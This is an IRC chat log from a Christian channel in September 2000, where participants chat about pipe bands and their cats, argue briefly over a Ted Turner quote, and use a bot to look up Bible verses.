[01:23] *** sWeAtPeA (Havoc36@ACA0D0DB.ipt.aol.com) has left #CHristian
(havoc.(r)oots.(r)adical)
[01:23] <weird> thing i liked also was highland bands.....
[01:24] <weird> like there was this dutch highland band
[01:24] <weird> in kilts
[01:24] *** danimal (anon@sdn-ar-010txhousP121.dialsprint.net) has joined #CHristian
[01:25] <weird> nice tooo
[01:25] <weird> i like a look of the kilt
[01:25] <weird> but
[01:25] * rts is away: not here
[01:25] <weird> dutch?
[01:25] *** rts (~samm@cr1016134-a.crdva1.bc.wave.home.com) has left #CHristian
[01:25] <Dawn> eagles` thanx for all the info and your time out to let me know what things
mean
[01:25] <eagles`> we have highland bands here in Austrlai too - on the plains, lol
[01:26] <eagles`> thats fine, look forward to seeing you again :)
[01:26] <eagles`> take care, God bless you
[01:26] <Colin^> Irish play the bagpipes as well
[01:26] <weird> and pipes
[01:26] <Dawn> Thanx and God Bless:)
[01:26] <weird> and harps
[01:26] <eagles`> yeah, they gave the Scots them as a present, and the Sciots havent seen
the joke yet,lol
[01:27] *** Dawn (prospect@bc-vic-a53-01-71.look.ca) has left #CHristian
[01:27] <weird> eagles that wasnt funny:(
[01:27] <eagles`> lol
[01:27] * eagles` actually loves pipe bands
[01:27] <weird> so oh ok goodie:)
[01:27] <eagles`> <g>
[01:28] <Colin^> I like Pipebands as well, I can still sing Scotland the brave
[01:28] <eagles`> the first time I ever heard Amazing Grace it was played by a pipe band
[01:28] * weird just sings psalms
[01:28] <weird> well psalters
[01:28] <Colin^> eagles` Paul mccartney did a bagpipe version, remember that?
[01:28] <eagles`> that would be about 1968
[01:28] <weird> but is not weird
[01:29] *** Bond-007 (PBrosnan@17-133.nctimes.net) has joined #CHristian
[01:29] <eagles`> no, I don't. I remember a single released while I was working at the TV
station at Bunbury
[01:29] <Colin^> Hi Bond-007
[01:29] <weird> mull of kintire
[01:29] <Bond-007> Wooo!! GO GOLDEN BEARS!
[01:29] <Colin^> weird yep
[01:29] <eagles`> thats beautiful too
[01:29] <weird> yeah.....soooo gooood
[01:29] <Colin^> Bond-007 Gummy bears?
[01:29] <Bond-007> Just went to my high school's football game. We kicked the crud out of
the other team :)
[01:29] <Bond-007> No! Golden Bears!! :)
[01:29] <cierra> woo hoo
[01:29] <cierra> bond
[01:30] *** tree` (.@cr432677-a.ym1.on.wave.home.com) has joined #CHristian
[01:30] <weird> i play mull of kintire on the pianee
[01:30] <weird> ten fingers
[01:30] * Colin^ prefers Gummy Bears
[01:30] * Bond-007 plays Nirvana in honor of the TVHS Bears
[01:30] <Bond-007> hehe Colin
[01:31] <weird> mix and match
[01:31] * eagles` forgets what he came on line to do
[01:31] <eagles`> grrrrrr
[01:31] <weird> so (bite me)
[01:32] * weird asks what Christian means?
[01:32] <Bond-007> It feels so nice to sit in this chair compared to the metal benches
[01:32] <Bond-007> Someone who follows Jesus Christ's teachings is the technical term
[01:32] *** Maverick (teri@203-79-65-231.tnt8.paradise.net.nz) has joined #CHristian
[01:32] <twile> !seen ricky77
[01:32] <Colin^> Hi Maverick
[01:33] <danimal> !seen danimal
[01:33] <weird> i like this room
[01:33] <eagles`> weird it is an expression first used at Antioch on the Palestinian coast
around 70AD meaning those who follow Christ... initially a term of derision some folk will
tell you
[01:33] <Maverick> Hi=)
[01:33] <Colin^> danimal was last on IRC channel #christian 8 minutes ago.]
[01:34] <eagles`> #Christian is a channel run by a number of Christians who are happy for
anyone to come in and chat as long as they dont try and me nasty
[01:34] <danimal> thanks colin
[01:34] <weird> b
[01:34] <eagles`> yeah typo
[01:34] <weird> yeah :)
[01:35] <weird> i have a dog called Solomon
[01:35] <weird> same deal
[01:35] * Colin^ has a Cat called MrJordan Big Eyes
[01:35] *** cierra (Beloved@ppp-3-46.compuwise.net) has left #CHristian
[01:35] <eagles`> how is MrJordonBigEyes?
[01:35] -> *cierra* I think I know you from a long time ago?
[01:35] <weird> well my dog is a rottweiler
[01:36] <Bond-007> JordAn
[01:36] <Bond-007> :)
[01:36] *** konfused (la@1Cust211.tnt1.sjc4.da.uu.net) has joined #CHristian
[01:36] <eagles`> hey!!!!!! konfused
[01:36] <Colin^> eagles` he hasn't been in today, but his wonderings are going to be nipped
in the bud soon
[01:36] <Colin^> ;o)
[01:36] <konfused> hello
[01:37] <eagles`> lol
[01:37] <Raid> My cats name is "Bug" well, it's "Sir red rusty bug." or, Bug for short ;p
[01:37] <eagles`> that seems to be what gets him into trouble
[01:37] <Colin^> :o)
[01:37] <weird> my cat is named jancy
[01:37] *** Eponine` (eponine@rocax1-169.dialup.optusnet.com.au) has joined #CHristian
[01:37] <Colin^> Raid have you seen my cats pic online yet?
[01:37] *** Disconnected
[01:37] * Raid is away since 01:37:58 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be
saved.
[01:37] *** Attempting to rejoin...
#CHristian Cannot send to channel
[01:38] * Raid has returned ( Auto-Away: Not here ) - on 01:38:01 @ 09/09/2000 - Away 0
minutes.
[01:38] *** Rejoined channel #christian
[01:38] *** Topic is 'Encourage each other daily. (Hebrews 3:13)'
[01:38] *** Set by Beukeboom on Fri Sep 08 03:42:57
[01:38] <Bond-007> and a bunch of fish that I havent named :)
[01:38] -logos3- http://www.forchrist.net - channel website, for rules and other info.
[01:38] * eagles` sends for the plumber
[01:38] <Eponine`> I have 3 cats, Chloe, Furby and Sootie
[01:38] <Bond-007> Furby :)
[01:38] <weird> i had a dog called chloe once
[01:38] <konfused> furbies? those evil owl looking things?
[01:38] * Maverick has no cats.
[01:38] <Eponine`> yep :)
[01:38] * weird has no donkeys
[01:38] <konfused> those scare me :\
[01:39] <Eponine`> Furby is really fat and ORANGE and he purrs so loud
[01:39] <konfused> i dont have a donkey either :(
[01:39] <Eponine`> ooh my furby doesn't scare anyone :)
[01:39] <konfused> i gots a kitty tho
[01:39] <Colin^> Maverick Sophie is having kittens want one?
[01:39] *** sansan` (ff@ip13.vancouver6.dialup.canada.psi.net) has left #CHristian
[01:39] <Eponine`> wish i had a pic scanned you wouldn't be scared:)
[01:39] <weird> i dooooo but i cant
[01:39] <konfused> heh
[01:40] <Eponine`> I call him Furr for short :) my friend calls him furrball
[01:40] <konfused> well, i guess as long as u can take your cat's batteries out
[01:40] *** Wildernes (Grichblix@elk-ras1-cs-23.win.bright.net) has joined #CHristian
[01:40] <Eponine`> heheheehe
[01:40] <Colin^> Hey Wildernes
[01:40] <konfused> my kittie is mean :\
[01:40] <Wildernes> hey colin
[01:40] <Eponine`> ooh i have a mean kitty too konfused
[01:40] <Colin^> =^¡^=
[01:40] <Eponine`> Chloe is a mean cow of a thing :)
[01:40] <konfused> it waits at the stairs.. and jumps out at u and bites.. an it hurteses
[01:40] <weird> nice one Colin
[01:41] <eagles`> lol
[01:41] * weird is impressed
[01:41] <konfused> he's our little stair troll
[01:41] <Eponine`> hahaha konfused
[01:41] <Eponine`> mine comes up to you and smooches and purrs and rubs against your legs
[01:41] <Eponine`> then when you pat her she bites really hard
[01:41] <Eponine`> draws blood sometimes
[01:41] <Eponine`> im trying to give her away :P
[01:41] <konfused> my cat doesnt do that :\ he only walks up to bite you
[01:42] <Eponine`> she was a nice cat until I got furby, i think she got jealous
[01:42] * Colin^ 's Cat can ride a bike, and makes me dinner
[01:42] <Eponine`> and has never gotten over it
[01:42] <Bond-007> hmmm. heres a great quote:
[01:42] <Bond-007> "Christians are losers."
[01:42] <Bond-007> -Ted Turner
[01:42] <Eponine`> LOL Colin makes you dinner????
[01:42] <Eponine`> Ted Turner must suck then :P
[01:42] <konfused> oh! i want your cat colin
[01:42] <Colin^> Eponine` ;o)
[01:42] <Bond-007> Ted Turner is not that big at thinking up memorable things to say is he?
[01:42] <konfused> does he clean the house too?
[01:42] * eagles` wonders Ted Turner... CNN??
[01:42] <Colin^> konfused I have his pics on my web page
[01:42] <Eponine`> Colin i'll trade you for Chloe?
[01:42] <Bond-007> Ted Turner owns Superstation etc
[01:42] <Bond-007> He owns alot of cable channels
[01:43] <weird> =^!^=
[01:43] <Bond-007> He owns the Atlanta Braves
[01:43] <konfused> is he cooking in the pics?
[01:43] <weird> not the same
[01:43] <Eponine`> :o :o =^.^= :o :o
[01:43] *** Belle707 (hmm@B102-03.HUNT.splitrock.net) has joined #CHristian
[01:43] <danimal> bond if it is not so memorable then why are you quoteing it?
[01:43] <eagles`> superstation is big in europe
[01:43] * Belle707 sighs ... cant sleep.
[01:43] <eagles`> i watched a bit of it when I was in Sweden oooh 10 years ago
[01:43] <Eponine`> ,,,=^.^=,,, <-- that is Chloe
[01:43] <Colin^> http://mysite.xtra.co.nz/~ColinRHopper/page3.html <---Our cats pics
[01:43] *** Jewelz`` (~none@hh1125223.direcpc.com) has joined #CHristian
[01:44] <eagles`> hello Belle707 :))
[01:44] <konfused> heh thats not my kitty he doesnt have clawses
[01:44] <Wildernes> hey belle
[01:44] <Eponine`> i will look at them collie
[01:44] <Belle707> hey Wildernes
[01:44] *** TallCaMan (jeep@waltz.rahul.net) has joined #CHristian
[01:44] <Colin^> Hi Belle707
[01:44] <Bond-007> danimal: because I just saw it on a website
[01:44] <weird> =^{}^=
[01:44] <weird> aaaaak
[01:44] <Bond-007> It was an atheist and scoffer quote page
[01:45] <Bond-007> We spend the first
[01:45] <Bond-007> to walk and talk and the next twelve telling them to sit down and shut up.
[01:45] <Bond-007> --Phyllis Diller
[01:45] <Bond-007> hehehe
[01:45] <weird> how do ya turn stuff ?
[01:45] <^John^> Colin^ it says your page is down :/
[01:45] <Eponine`> collie: are those kitten photos recent?
[01:45] <danimal> so what is the purpose to quote him?
[01:45] <Eponine`> the orange one looks like furby :)
[01:45] *** twile (freezer@207.0.112.77) Quit (Ping timeout for twile[207.0.112.77])
[01:45] <Colin^> Eponine` one of them is a cat now
[01:45] <^John^> I went there cuz I love kittens
[01:45] <konfused> Oh! cute little kitty kats
[01:45] <Bond-007> danimal: to show how ignorant some people are
[01:46] <^John^> Hey how are u ppl getting it to load
[01:46] *** Twinsen (titusfox98@121.ppp1-2.osl1.world-online.no) has joined #CHristian
[01:46] <Colin^> Have a look at Mr Jordan Big Eyes
[01:46] <Eponine`> Colin did you keep any of them?
[01:46] <Eponine`> John try to refresh it?
[01:46] <Colin^> Eponine` yes one of the cameo one
[01:46] <danimal> what makes him ignore by that quote
[01:46] <danimal> hate‚ignorance
[01:46] *** cierra (Beloved@ppp-3-46.compuwise.net) has joined #CHristian
[01:47] <Bond-007> thinking that Christians are Losers. Its a broad vague ignorant statement.
[01:47] <Raid> Colin^: HEHEHE, nice kitty ;p
[01:47] <danimal> how is it ignorant?
[01:47] <Colin^> Raid he is a great cat
[01:48] <Wildernes> bond: but never underestimate the abiity of the press to quote things
out of context.
[01:48] <konfused> silly kittys
[01:48] <Eponine`> Which one is the cameo one Colin?
[01:48] <Wildernes> who knows what he might have actually indended to say?
[01:48] <Colin^> Eponine` the light ginger ones
[01:48] <Colin^> Tes Turnip?
[01:48] <Colin^> Ted Turnip
[01:48] <Bond-007> Does he know every Christian ever alive?
[01:48] <Eponine`> I love orange ones:)
[01:48] *** Philip15 (CrAzzy@202.151.212.14) has joined #CHristian
[01:49] <konfused> aw now i wana go play wif my lil stair troll
[01:49] <konfused> but he'll beat me up :|
[01:49] <danimal> The only thing ignorant here is the standard at which ted judges losing
[01:49] <Bond-007> no. So he shouldn't say "Christians are losers." Its his opinion too.
Personally I think we are winners because through Christ we have been saved and will live
eternally for ever with the Lord and Saviour.
[01:49] <weird> turnips are a dun color
[01:49] <weird> oops sorry:(
[01:49] <Colin^> turnips are nice in soup
[01:50] <Eponine`> I have 2 kittens in my room with me now, the two nice ones:) they are
feeling the heat here in Rocky
[01:50] <Raid> shrug, bugs making a mess with his food bowl.
[01:50] <weird> and roasted n the oven
[01:50] *** Wildernes (Grichblix@elk-ras1-cs-23.win.bright.net) Quit (Leaving)
[01:50] *** ROCKIN4JC (BLAH@C47-ts1.timaru.com) has joined #CHristian
[01:50] * konfused skips off to find her kitty kat
[01:50] <Colin^> Hey ROCKIN4JC
[01:50] <Raid> He likes to get it out one piece at a time with his paw, and munch it out of
his paw.
[01:50] <danimal> bond that's great you have a different opinion
[01:50] <eagles`> lol
[01:50] <Raid> He always leaves big mess, where he drops some of it.
[01:51] <Raid> or starts munching it, and little fragments break off.
[01:51] <ROCKIN4JC> Hey Colin
[01:51] <Eponine`> Dogs have owners, Cats have staff ~~anonomous
[01:51] <Raid> messy mesy kitty
[01:51] *** Adelphos (LC@PPPa45-ResaleNashville3-5R7232.saturn.bbn.com) has joined #CHristian
[01:51] <^John^> Colin^ is it listed in the directory?
[01:51] <Colin^> Cats Rule Dogs Drool
[01:51] <konfused> i found my stair troll :)
[01:51] *** ROCKIN4JC (BLAH@C47-ts1.timaru.com) Quit (Leaving)
[01:51] <Raid> Colin^: heheh
[01:51] <Eponine`> hehehe
[01:51] <Raid> konfused: lol ;p
[01:51] <Colin^> ^John^ is what?
[01:51] <^John^> Your web oage
[01:51] <^John^> Page even
[01:52] <Eponine`> I like pigs too (the guinnea kind) they are furry pigs
[01:52] *** Adelphos (LC@PPPa45-ResaleNashville3-5R7232.saturn.bbn.com) has left #CHristian
[01:52] <weird> so are you guys seriously all christians?
[01:52] <Eponine`> Colin, Tiger is soooo cute! it's a she isn't it? a tortoise shell?
[01:52] <^John^> I am all a Christian
[01:52] <Bond-007> I am weird
[01:52] <Bond-007> err I am, weird
[01:52] <Jewelz``> weird, not I :)
[01:52] <Colin^> Eponine` yes, she squeeks like a mouse as well
[01:53] <Raid> Eponine`: I dunno about tiger, but I think the mrbig eyes one is a calico?
[01:53] * weird is not convinced
[01:53] <Raid> weird: No, I'm not a christian.
[01:53] <Colin^> weird not everyone in here is
[01:53] <Eponine`> cute colin :)))))))))
[01:53] <Eponine`> what is a calico, Raid? is that the colour?
[01:53] * Raid cat is a purebread long redhaired persian
[01:53] <Colin^> Raid Mr Jordan Big Eyes is the big cat with a coons tail, he is a Maine Coon
[01:53] <Raid> Eponine`: No, it's the bred.
[01:54] <danimal> weird: just like i don't have to believe an arguement to defend it
[01:54] <Raid> Colin^: HAHAHA, seriously?
[01:54] <Raid> he doesn't look like a coon from the pic.
[01:54] <Raid> no wait, I take that back.
[01:54] <Raid> he does.
[01:54] <salutar> Let my mouth be filled with Thy praise, that I may hymn Thy glory and Thy
majesty all the day long
[01:54] *** Skippii (wallaby@kawax3-189.dialup.optusnet.com.au) has joined #CHristian
[01:54] *** TallCaMan (jeep@waltz.rahul.net) Quit (Leaving)
[01:54] *** Skippii (wallaby@kawax3-189.dialup.optusnet.com.au) has left #CHristian
[01:54] <Raid> Colin^: how did you get a maine kitty all the way where you are?
[01:55] <Colin^> Raid he will go for a walk around the block at night with me
[01:55] <weird> calico cats are always female and called tortoiseshell sometimes cos of the
colour mix .... this is not a dictionary definition
[01:55] <Raid> weird: No...
[01:55] <Colin^> Raid, someone brought the bereed over here
[01:55] <Raid> weird: I had two male calico kitties.
[01:55] <weird> no way!
[01:55] <Raid> weird: Yes dude.
[01:55] *** Skypark (~rs@ppp10-iligan.mozcom.com) has joined #CHristian
[01:55] <Skypark> hi all
[01:55] <salutar> Let my mouth be filled with Thy praise, that I may hymn Thy glory and Thy
majesty all the day long
[01:55] <weird> always female
[01:56] <eagles`> hey Skypark
[01:56] <Raid> weird: hrm.. Nope. Had two calicos, and I know for a fact they were male ;p
[01:56] <eagles`> amen salutar
[01:56] <Colin^> weird yes tortisshell are always female
[01:56] <Skypark> hello big ""
[01:56] <Raid> standard calico
[01:56] <Skypark> hello big "e"
[01:56] <Skypark> :)
[01:56] <weird> than you Colin
[01:56] <weird> k
[01:56] <Raid> they don't have the as big white spot as colins.
[01:56] <Eponine`> oooh calico and tortoishell are the same??
[01:56] <Raid> Eponine`: No
[01:56] <weird> yeah
[01:56] <Raid> They are kinda built like siamese
[01:56] <Raid> long... slender things
[01:57] <weird> torti and callis are the same
[01:57] <weird> mixed breeds but cute
[01:57] <Raid> dude, I swear...
[01:57] <Raid> they were pure calicos
[01:57] <Raid> we had two of them.
[01:58] <weird> there is only only one pure calico......
[01:58] <Eponine`> all the tortis I know have attitudes :P
[01:58] <Colin^> calicos are different, Sophoie, one of our kittens is Cameo
[01:58] <Raid> Eponine`: they meow alot too ;p
[01:58] <Eponine`> yep sure do, really cute meows :)
[01:58] <Raid> and I mean alot.
[01:58] <Raid> yes yes
[01:58] <Eponine`> they are demanding!
[01:58] <Raid> Oh indeed
[01:58] <weird> calm down guys
[01:58] <Raid> if you don't pet them right away, they'll go out of there way to get in your
way so you do hehe
[01:58] <Eponine`> and they ignore you when they are tired too
[01:59] <Eponine`> hehehehe yep!
[01:59] <Raid> and they dont purr much
[01:59] <Raid> well, they do sometimes, but they meow more
[01:59] <Eponine`> one of mine, licks my fingers non stop
[01:59] <Raid> Bug on the other hand, he's a purrer
[01:59] <Raid> and a lap cat hehe
[01:59] <Eponine`> hehehehe
[01:59] <Eponine`> and a biter when she feels like it
[01:59] *** Tomm (Jasper@adsl-64-217-147-252.dsl.eulstx.swbell.net) has joined #CHristian
[01:59] <Raid> hes a cuddly bugsy wugsy
[01:59] *** Tomm (Jasper@adsl-64-217-147-252.dsl.eulstx.swbell.net) has left #CHristian
[02:00] *** Twinsen (titusfox98@121.ppp1-2.osl1.world-online.no) has left #CHristian
[02:00] <Eponine`> aww :)
[02:00] <Eponine`> have you got a picture?
[02:00] <Raid> Yep, but no scanner
[02:00] <Raid> heh
[02:00] <Raid> Bright red and orange.
[02:00] <Raid> with the orange stripes hehe
[02:00] <Raid> and the huge paws.
[02:00] <Eponine`> awww :)
[02:00] <Eponine`> both my tortis were strays
[02:00] *** Philip15 (CrAzzy@202.151.212.14) Quit (Broken pipe)
[02:00] <Raid> and hes lazy as heck
[02:00] <Eponine`> they are both dark with flecs of every colour :)
[02:00] <weird> my neice sent me a picture of a big pussy i thought it might be a joke and
it was
[02:01] <weird> ie
[02:01] <Raid> I've seen him stretch out in the middle of the kitchen floor. hehe
[02:01] <Eponine`> huge paws are so cute :)
[02:01] <Eponine`> they look like little lion cubs :)
[02:01] <Raid> YES
[02:01] <Raid> he resembles a baby lion or tiger ;p
[02:01] <Eponine`> hehe
[02:01] <Eponine`> kittens rule:)
[02:02] <Raid> but because he has a smushed in face, I have to clean his nose and eyes for
him. hehe
[02:02] <Eponine`> awww
[02:02] <Eponine`> my sootie the torti has a smushed face too
[02:02] <Eponine`> i think she might be part persian
[02:02] <Eponine`> her full name is Princess Sootie Lucky Buttons
[02:03] *** triasha (~welcome40@208.142.147.190) has joined #CHristian
[02:03] <Raid> hehehe
[02:03] <weird> recessive gene the torti thingie
[02:03] <triasha> mesay u there?
[02:03] <Colin^> Have you guys seen those bald cats?
[02:03] <ramdac> ?
[02:04] <Colin^> Ugly looking things
[02:04] <Eponine`> Sphinx?
[02:04] <konfused> those things look cool, lol
[02:04] <weird> (am i living up to my name?)
[02:04] <Eponine`> with huge ears and really bony
[02:04] <tree`> I have... on tv
[02:04] * konfused attempts to be wierder than weird
[02:04] *** ^John^ is now known as JohnBRB
[02:04] <Colin^> Austin Powers has a bald cat
[02:05] <weird> oh ok you have thi stage Konfused:)
[02:05] <tree`> those cats are supposed to be specially breaded
[02:05] <Eponine`> did anyone seen Cats the musical???
[02:05] <konfused> heh
[02:05] <Eponine`> I had front row, it was sooo cool
[02:05] * konfused be's weirder than weird
[02:05] <Eponine`> I got to touch the kittens :)
[02:05] *** thumps (awBabydawl@c949298-a.decatur1.il.home.com) has joined #CHristian
[02:05] <konfused> there, how was that? :)
[02:05] *** WingNut (psa23@A020-0450.TULS.splitrock.net) has joined #CHristian
[02:05] <Colin^> Hey thumps
[02:05] <Colin^> ...
[02:05] <Colin^> Hi ya WingNut
[02:05] <thumps> grrrrrreetings
[02:05] <thumps> heya Colin
[02:05] <Eponine`> and one of them took an audience member's coat and did little marching
girl (marching kitten, you know what i mean) it was soo cool
[02:05] <thumps> ...
[02:05] <thumps> wing
[02:05] <WingNut> Heya, thumps!
[02:05] <WingNut> Hey Colin^!!!! :o)
[02:06] * weird sees everybody luvs Colin
[02:06] *** ramdac (ramdac@1Cust138.tnt1.ruston.la.da.uu.net) Quit
[02:06] * weird included
[02:06] <weird> so kewl :)
[02:06] <Raid> Some people say cats are stupid because you can't train them. This isn't
true. it's not that you can't train them, it's easier for them to train you. ;p
[02:06] <Eponine`> Colin always meows at me :))))
[02:07] <konfused> my cat plays fetch
[02:07] <Eponine`> hahahaha raid, so true!
[02:07] <Eponine`> konfused, really"??????
[02:07] <Colin^> Eponine` have doene for 4 years or more
[02:07] <konfused> yup, much better than my dog too
[02:07] <Eponine`> yeppers:)
[02:07] <Eponine`> with a toy or what?
[02:07] <WingNut> Raid: I once heard someone make the observation: Humans train dogs, cats
train humans, nobody trains cats. So who is smarter?
[02:07] *** sunshineM (chris-p@cx989100-b.orng1.occa.home.com) has joined #CHristian
[02:07] <Raid> WingNut: LOL
[02:07] <konfused> yup :) this little stuffed monkey...
[02:08] <weird> ferrets
[02:08] <eagles`> interesting rofl
[02:08] <WingNut> Hey, sunshineM.
[02:08] *** sunshineM (chris-p@cx989100-b.orng1.occa.home.com) Quit (Read error to
sunshineM: EOF from client)
[02:08] <weird> oh and pigs and horses might get a mention
[02:08] <Eponine`> cool, confused :)
[02:08] <Eponine`> LOL wingnut
[02:08] <danimal> does logos have a topical concordance?
[02:08] <Eponine`> knofused, i mean
[02:08] <Eponine`> oops
[02:08] <Eponine`> konfused :)
[02:08] <konfused> heh
[02:08] * eagles` is off to do stuff offline... wish I could remember why I cam on line and
hour and a half ago, though
[02:09] <Colin^> danimal he will do simple searches
[02:09] <weird> bye eagles:)
[02:09] <Colin^> Bye eagles
[02:09] <eagles`> ooroo
[02:09] <Eponine`> byee eagles :)
[02:09] <Eponine`> ooroo
[02:09] <konfused> bye eagle
[02:09] <konfused> s
[02:09] <weird> tut such self control:)
[02:10] <weird> i have none
[02:10] * Eponine` either
[02:10] <Raid> Eponine`: My cat seems to know when I'm not feeling well too.
[02:10] <Raid> he'll come over and sit by me, and purr me a little tune.. sometimes even
kneed me.
[02:10] <eagles`> !skjv apostle
[02:10] <logos3> Seek Reply: Matthew 10:2, Mark 6:30, Acts 1:2, Acts 1:25, Acts 1:26, Romans
1:1, Romans 1:5, Acts 2:37, Luke 6:13, Acts 2:42, 1 Corinthians 1:1, Acts 2:43, 2
Corinthians 1:1, Galatians 1:1, Ephesians 1:1, Galatians 1:17, Galatians 1:19, Colossians
1:1, Galatians 2:8, 2 Timothy 1:1 ...
[02:10] <triasha> mmmeeeeeeeeesssssssaaaaaaaaayyyyyyyy txt nman dyan
[02:11] <eagles`> wonder if....
[02:11] <Colin^> Raid my cat does that if I am in bed with a BAD migraine, he will come and
cuddle up for hours
[02:11] <eagles`> !skjv acts apostle
[02:11] <Raid> when I have the flu it sucks, cause I have to make him get away from me, so I
dont get him sick. hehe
[02:11] <logos3> Seek Reply:
[02:11] <eagles`> no you can't use a modifier
[02:11] <weird> dogs lickings are healthy
[02:12] <Eponine`> Wow Raid mine does too :)
[02:12] <Eponine`> when i broke up with a BF and was upset, my cat (the nasty one who was
nice back then) wouldnt leave me alone hehehe
[02:12] <Eponine`> cats just seem to know, eh?
[02:12] <Raid> yep
[02:12] <danimal> colin do you believe that telepathy exitst?
[02:12] <Eponine`> i love when they kneed
[02:12] <Raid> bug seemed to know I was talking about him, cause he's perched himself on my
lap now.
[02:12] <Eponine`> its so cute
[02:13] <Raid> he ordered me to move my legs so he could sit comfortably. (he has a good
sense of how far into my skin he can put his claws.. hehe)
[02:13] <eagles`> sounds like the siamese I used to have
[02:13] <Colin^> danimal I used to do it
[02:13] *** Maverick (teri@203-79-65-231.tnt8.paradise.net.nz) Quit (Ping timeout for
Maverick[203-79-65-231.tnt8.paradise.net.nz])
[02:14] <Raid> I consider him to be more then a pet to me. heh
[02:14] <Colin^> So yes I do believe you can talk through it
[02:14] <Eponine`> hehehehe
[02:14] <Raid> hes like.. my best friend.
[02:14] <weird> big brother training of chaquita is kinda flawed
[02:14] <Raid> always there when I need someone to talk too.
[02:14] <danimal> Auras?
[02:14] <Eponine`> mine are my children :)
[02:14] <logos3> talk through what?
[02:14] <Eponine`> Furby is sitting on my computer desk now and purring
[02:14] <weird> BUT
[02:14] <Eponine`> can hardly move my mouse hehehe
[02:14] <logos3> oh :)
[02:14] <weird> very loving
[02:14] <Raid> hahahahaha
[02:14] * Colin^ has to go, Abbigail has made me two big hamburgers(my favourates)
[02:14] <Eponine`> yikes he's nearly falling off the desk but he's still asleep and purring
[02:15] *** eagles` (rashton@1Cust223.tnt4.adl1.da.uu.net) Quit (Pipe broken, plumber sent
for, priority low)
[02:15] <Raid> Eponine`: lol
[02:15] <Colin^> take care all
[02:15] <Eponine`> awww byeeee Collies take care
[02:15] <Bond-007> bye Colin^!!!!!!!!!
[02:15] <Skypark> heheheheh
[02:15] <weird> bye Col:)
[02:15] <Colin^> mews Eponine`
[02:15] <Eponine`> mews :)
[02:15] <Colin^> Bye Bond-007, take care
[02:15] <Skypark> na na na na na
[02:15] <Colin^> Bye weird, nice to meet you
[02:15] <Raid> Eponine`: If I don't pet bug when he arrives in my lap, He'll climb on top of
the keyboard and sit on it until I acknowledge him.
[02:15] * Eponine` 's Furby is the clumsiest cat ever :)
[02:15] <weird> u 2
[02:15] <Eponine`> LOL Raid, does he try to type???
[02:16] * konfused takes the batteries out of eponine's cat
[02:16] <Raid> Nope. he just knows my attentions on the computer, and he remedies the
problem hehe
[02:16] *** jamie^16 (~Jazzman@dx-52.pempe.net) Quit (Why do people cry when they hear the
word goodbye!!!!)
[02:16] <Eponine`> lol konfused!
[02:16] *** Colin^ (hello@p99-tnt1.ham.ihug.co.nz) Quit (And the Band played
on................and on................and on..................and
on..........................)
[02:16] *** Disconnected
[02:16] * Raid is away since 02:16:45 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be
saved.
[02:16] *** Attempting to rejoin...
#CHristian Cannot send to channel
* Timer 100 halted
* Timer 101 halted
[02:16] * Raid has returned ( Auto-Away: Not here ) - on 02:16:48 @ 09/09/2000 - Away 0
minutes.
[02:16] *** Rejoined channel #christian
[02:16] *** Topic is 'Encourage each other daily. (Hebrews 3:13)'
[02:16] *** Set by Beukeboom on Fri Sep 08 03:42:57
[02:16] -logos3- http://www.forchrist.net - channel website, for rules and other info.
[02:16] <Eponine`> aww
[02:16] <Eponine`> wb :)
[02:17] <Eponine`> Raid, sounds like he's got you wrapped around his little paw :)
[02:17] <Raid> lol
[02:17] <Raid> yep.
[02:17] <Bond-007> grrrrrr
[02:17] <Bond-007> stupid internet!
[02:17] <Bond-007> Why must you disconnect her!
[02:18] <Bond-007> I was talking to her asking her what time she wanted to be picked up and
she got disconnected
[02:18] <Eponine`> aww poor Bond
[02:19] <Bond-007> That makes me so mad
[02:19] <Bond-007> Its 11:19PM so too late to call
[02:19] <Eponine`> will she come back?
[02:19] <Bond-007> i hope
[02:19] *** jamie^16 (~Jazzman@dx-52.pempe.net) has joined #CHristian
[02:19] <Bond-007> Im gonna goto sleep soon so I can wake up early so I can call her and get
directions to her house etc
[02:20] *** KJV1611 (KJV1611@digital45.pm3-02.orlando-fl.bitstorm.net) has joined #CHristian
[02:20] *** ZoOrOpA (ash@ak-d76.actrix.co.nz) has joined #CHristian
[02:20] *** AceRadio (~AceRadio@ppp-207-193-1-178.kscymo.swbell.net) has joined #CHristian
[02:21] <Bond-007> well its been almost 5 minutes
[02:21] *** logos3 sets mode: +o ZoOrOpA
[02:21] <Bond-007> i dont think she is coming back
[02:21] *** ZoOrOpA sets mode: -o ZoOrOpA
[02:21] *** Disconnected
[02:21] * Raid is away since 02:21:32 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be
saved.
[02:21] *** Attempting to rejoin...
#CHristian Cannot send to channel
[02:21] *** Rejoined channel #christian
[02:21] *** Topic is 'Encourage each other daily. (Hebrews 3:13)'
[02:21] *** Set by Beukeboom on Fri Sep 08 03:42:57
[02:21] -logos3- http://www.forchrist.net - channel website, for rules and other info.
[02:21] <Bond-007> hi ZoOrOpA
[02:21] <weird> i luv these nicks
[02:21] <AceRadio> wb raid
[02:21] <ZoOrOpA> hi
[02:21] <Eponine`> wb Raid
[02:22] *** Luther (~Boggs@iq-col-as000-158.iquest.net) has joined #CHristian
[02:22] <AceRadio> Welcome to #Christian, luther
[02:23] <AceRadio> has thatcher been on lately?
[02:24] <danimal> yesterday
[02:24] <AceRadio> hmmm
[02:24] *** weird (mirr@edtntnt3-port-57.dial.telus.net) Quit (Leaving)
[02:24] <AceRadio> niv rev 2:3
[02:25] <AceRadio> guess the bots are down right now
[02:25] <danimal> !niv rev 2:3
[02:25] <logos3> danimal: Rev 2:3 "3 You have persevered and have endured hardships for my
name, and have not grown weary." (NIV)
[02:25] <AceRadio> gotta use the '!"?
[02:25] <danimal> yup
[02:25] <AceRadio> !niv rev 2:5
[02:25] <logos3> AceRadio: Rev 2:5 "5 Remember the height from which you have fallen! Repent
and do the things you did at first. If you do not repent, I will come to you and remove your
lampstand from its place." (NIV)
[02:25] <AceRadio> ah, ok
[02:26] <AceRadio> !niv jeremiah 3:8
[02:26] *** TopTed (GuitarLab@208.44.38.171) has joined #CHristian
[02:26] <logos3> AceRadio: Jeremiah 3:8 "8 I gave faithless Israel her certificate of
divorce and sent her away because of all her adulteries. Yet I saw that her unfaithful
sister Judah had no {fear;} she also went out and committed adultery." (NIV)
[02:26] <AceRadio> Welcome to #Christian, topted
[02:26] <TopTed> hi AceRadio
[02:26] *** ZoOrOpA (ash@ak-d76.actrix.co.nz) Quit (The Moon is up..and over One Tree
Hill.....we see the sun go down in your eyes.....)
